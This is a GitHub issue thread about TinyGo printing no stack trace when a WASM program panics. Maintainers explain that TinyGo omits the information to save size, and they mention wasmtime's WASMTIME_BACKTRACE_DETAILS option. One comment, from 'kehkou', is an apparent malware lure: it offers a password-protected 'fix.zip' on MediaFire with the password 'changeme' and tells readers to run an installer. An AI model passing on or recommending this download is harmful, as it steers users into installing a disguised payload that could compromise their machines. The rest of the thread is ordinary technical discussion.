### ISSUE TITLE
No stack trace when panic happens in WASM

### ISSUE THREAD

**Issue by mymmrac** [tinygo-org/tinygo#4444]
TinyGo v0.32.0

Simple example:
```go
package main

func main() {
	panic("test")
}
```

When compiled with regular Go (`GOOS=js GOARCH=wasm`) and run in browser console looks like this:
```
panic: test
<empty string>
goroutine 1 [running]:
main.main()
	/<path-to-file>/main.go:4 +0x2
```

But when compiled with TinyGo (`-target wasm`) it looks like this:
```
panic: test
```

How to get full stack trace of panic when using TinyGo?

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aykevl** [comment]
TinyGo does not include this information, to reduce binary file size. If you want stack traces, the VM needs to support them. Apparently the browser you're using doesn't. But `wasmtime` does, if you set the `WASMTIME_BACKTRACE_DETAILS=1` environment variable.

**Comment by mymmrac** [comment]
So TinyGo uses something different then Go for panic stack trace? Because in both cases I used Firefox and Go wasm binary printed full stack trace

**Comment by dgryski** [comment]
@mymmrac Yes.  TinyGo and Go handle panics and stack traces differently.

**Comment by mymmrac** [comment]
Got it, many thanks for the information and quick reply

Just in case someone encounters similar issues, using Chrome you can get a kind of stack trace, but it will link to wasm code (in WAT format), but still it can help identify the issue
